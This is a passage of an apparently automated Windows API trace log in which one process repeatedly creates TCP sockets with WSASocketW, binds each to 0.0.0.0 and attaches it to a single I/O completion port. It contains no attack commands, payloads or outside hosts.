dwFlags=0x1) returned 0x4c0 [0137.106] bind (s=0x4c0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.107] CreateIoCompletionPort (FileHandle=0x4c0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.107] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c4 [0137.107] bind (s=0x4c4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.107] CreateIoCompletionPort (FileHandle=0x4c4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.107] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8 [0137.107] bind (s=0x4c8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.107] CreateIoCompletionPort (FileHandle=0x4c8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.108] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc [0137.108] bind (s=0x4cc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.108] CreateIoCompletionPort (FileHandle=0x4cc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.108] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d0 [0137.108] bind (s=0x4d0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.108] CreateIoCompletionPort (FileHandle=0x4d0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.109] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d4 [0137.109] bind (s=0x4d4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.109] CreateIoCompletionPort (FileHandle=0x4d4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.109] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d8 [0137.109] bind (s=0x4d8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.109] CreateIoCompletionPort (FileHandle=0x4d8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.109] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0137.110] bind (s=0x4dc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.110] CreateIoCompletionPort (FileHandle=0x4dc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.110] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0 [0137.110] bind (s=0x4e0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.110] CreateIoCompletionPort (FileHandle=0x4e0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.110] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4 [0137.111] bind (s=0x4e4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.111] CreateIoCompletionPort (FileHandle=0x4e4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.111] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e8 [0137.111] bind (s=0x4e8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.111] CreateIoCompletionPort (FileHandle=0x4e8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.111] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4ec [0137.111] bind (s=0x4ec, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.112] CreateIoCompletionPort (FileHandle=0x4ec, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.112] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f0 [0137.112] bind (s=0x4f0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.112] CreateIoCompletionPort (FileHandle=0x4f0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.112] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0137.113] bind (s=0x4f4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.113] CreateIoCompletionPort (FileHandle=0x4f4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.113] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8 [0137.113] bind (s=0x4f8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.113] CreateIoCompletionPort (FileHandle=0x4f8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.113] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4fc [0137.113] bind (s=0x4fc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.114] CreateIoCompletionPort (FileHandle=0x4fc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.114] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x500 [0137.114] bind (s=0x500, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.114] CreateIoCompletionPort (FileHandle=0x500, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.114] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x504 [0137.114] bind (s=0x504, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.115] CreateIoCompletionPort (FileHandle=0x504, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.115] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x508 [0137.115] bind (s=0x508, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.116] CreateIoCompletionPort (FileHandle=0x508, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.116] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x50c [0137.116] bind (s=0x50c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.116] CreateIoCompletionPort (FileHandle=0x50c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.116] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x510 [0137.116] bind (s=0x510, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.117] CreateIoCompletionPort (FileHandle=0x510, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.117] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x514 [0137.117] bind (s=0x514, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.117] CreateIoCompletionPort (FileHandle=0x514, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.117] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x518 [0137.117] bind (s=0x518, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.118] CreateIoCompletionPort (FileHandle=0x518, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.118] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x51c [0137.118] bind (s=0x51c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.118] CreateIoCompletionPort (FileHandle=0x51c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.118] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x520 [0137.118] bind (s=0x520, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.119] CreateIoCompletionPort (FileHandle=0x520, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.119] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x524 [0137.119] bind (s=0x524, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.119] CreateIoCompletionPort (FileHandle=0x524, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.119] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x528 [0137.119] bind (s=0x528, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.120] CreateIoCompletionPort (FileHandle=0x528, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.120] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x52c [0137.120] bind (s=0x52c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.120] CreateIoCompletionPort (FileHandle=0x52c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.120] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x530 [0137.121] bind (s=0x530, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.121] CreateIoCompletionPort (FileHandle=0x530, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.121] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x534 [0137.121] bind (s=0x534, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.122] CreateIoCompletionPort (FileHandle=0x534, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.122] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x538 [0137.122] bind (s=0x538, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.122] CreateIoCompletionPort (FileHandle=0x538, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.122] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x53c [0137.122] bind (s=0x53c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.122] CreateIoCompletionPort (FileHandle=0x53c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.123] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x540 [0137.123] bind (s=0x540, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.123] CreateIoCompletionPort (FileHandle=0x540, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.123] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x544 [0137.123] bind (s=0x544, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.123] CreateIoCompletionPort (FileHandle=0x544, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.123] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x548 [0137.124] bind (s=0x548, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.129] CreateIoCompletionPort (FileHandle=0x548, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.129] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x54c [0137.129] bind (s=0x54c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.129] CreateIoCompletionPort (FileHandle=0x54c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.130] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x550 [0137.130] bind (s=0x550, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.130] CreateIoCompletionPort (FileHandle=0x550, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.130] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x554 [0137.130] bind (s=0x554, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.130] CreateIoCompletionPort (FileHandle=0x554, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.130] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x558 [0137.131] bind (s=0x558, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.131] CreateIoCompletionPort (FileHandle=0x558, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.131] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x55c [0137.131] bind (s=0x55c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.131] CreateIoCompletionPort (FileHandle=0x55c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.131] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x560 [0137.132] bind (s=0x560, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.132] CreateIoCompletionPort (FileHandle=0x560, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.132] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x564 [0137.132] bind (s=0x564, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.132] CreateIoCompletionPort (FileHandle=0x564, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.132] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x568 [0137.133] bind (s=0x568, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.133] CreateIoCompletionPort (FileHandle=0x568, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.133] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x56c [0137.133] bind (s=0x56c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.133] CreateIoCompletionPort (FileHandle=0x56c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.133] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x570 [0137.133] bind (s=0x570, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.134] CreateIoCompletionPort (FileHandle=0x570, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.134] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x574 [0137.134] bind (s=0x574, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.134] CreateIoCompletionPort (FileHandle=0x574, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.134] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x578 [0137.134] bind (s=0x578, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.135] CreateIoCompletionPort (FileHandle=0x578, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.135] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x57c [0137.135] bind (s=0x57c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.135] CreateIoCompletionPort (FileHandle=0x57c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.135] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x580 [0137.135] bind (s=0x580, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.136] CreateIoCompletionPort (FileHandle=0x580, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.136] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x584 [0137.136] bind (s=0x584, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.136] CreateIoCompletionPort (FileHandle=0x584, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.136] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x588 [0137.136] bind (s=0x588, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.137] CreateIoCompletionPort (FileHandle=0x588, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.137] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x58c [0137.137] bind (s=0x58c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.137] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.137] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x590 [0137.137] bind (s=0x590, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.138] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.138] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x594 [0137.138] bind (s=0x594, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.138] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.138] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x598 [0137.138] bind (s=0x598, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.139] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.139] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x59c [0137.139] bind (s=0x59c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.139] CreateIoCompletionPort (FileHandle=0x59c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.139] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5a0 [0137.139] bind (s=0x5a0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.140] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.140] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5a4 [0137.140] bind (s=0x5a4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.140] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.140] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5a8 [0137.140] bind (s=0x5a8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.141] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.141] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5ac [0137.141] bind (s=0x5ac, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.141] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.141] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b0 [0137.141] bind (s=0x5b0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.141] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.142] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b4 [0137.142] bind (s=0x5b4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.142] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.142] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b8 [0137.143] bind (s=0x5b8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.143] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.143] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5bc [0137.143] bind (s=0x5bc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.143] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.144] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5c0 [0137.144] bind (s=0x5c0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.144] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.144] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5c4 [0137.144] bind (s=0x5c4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.144] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.145] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5c8 [0137.145] bind (s=0x5c8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.145] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.145] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5cc [0137.145] bind (s=0x5cc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.145] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.145] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5d0 [0137.146] bind (s=0x5d0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.146] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.146] WSASocketW (af=2, type=1, 